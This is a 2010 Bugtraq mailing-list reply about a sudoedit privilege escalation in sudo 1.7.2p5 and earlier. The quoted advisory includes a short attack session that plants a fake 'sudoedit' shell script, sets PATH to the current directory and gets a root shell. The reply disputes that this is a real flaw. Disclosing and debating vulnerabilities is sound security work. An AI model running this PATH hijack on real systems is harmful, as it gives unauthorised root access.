Re: sudoedit local privilege escalation through PATH manipulation

[Ansgar Wiechers <bugtraq () planetcobalt net>]

On 2010-04-19 Agazzini Maurizio wrote:
> 1. Abstract.
>
> While writing an article about the vulnerability outlined in
> CVE-2010-0426, we found a distinct security flaw, also related to the
> sudoedit pseudo-command. Specifically, the path component of sudoedit
> is not checked correctly. This can be easily exploited by a local user
> with permission to run sudoedit, in order to execute arbitrary
> commands as root.
>
> 2. Example Attack Session.
>
> inode@pandora:~$ echo "/bin/sh" > sudoedit
> inode@pandora:~$ /usr/bin/chmod +x sudoedit
> inode@pandora:~$ id
> uid=1000(inode) gid=100(users) groups=100(users)
> inode@pandora:~$ export PATH=.
> inode@pandora:~$ /usr/bin/sudo sudoedit /etc/hosts
> Password:
> sh-3.1# /usr/bin/id
> uid=0(root) gid=0(root)
> groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),
> 11(floppy),17(audio),18(video),19(cdrom),26(tape),83(plugdev),
> 84(power),86(netdev),93(scanner)
> sh-3.1#
>
> 3. Affected Platforms.
>
> All vendors supporting sudo <= 1.7.2p5 are affected. Exploitation of
> this vulnerability requires that the /etc/sudoers file be configured
> to allow the attacker to run sudoedit.

Perhaps I'm missing something, but how is this a security flaw? A user
who is allowed to run "sudoedit" can edit /etc/sudoers, and thus allow
himself to run any command anyway.

Regards
Ansgar Wiechers
-- 
"All vulnerabilities deserve a public fear period prior to patches
becoming available."
--Jason Coombs on Bugtraq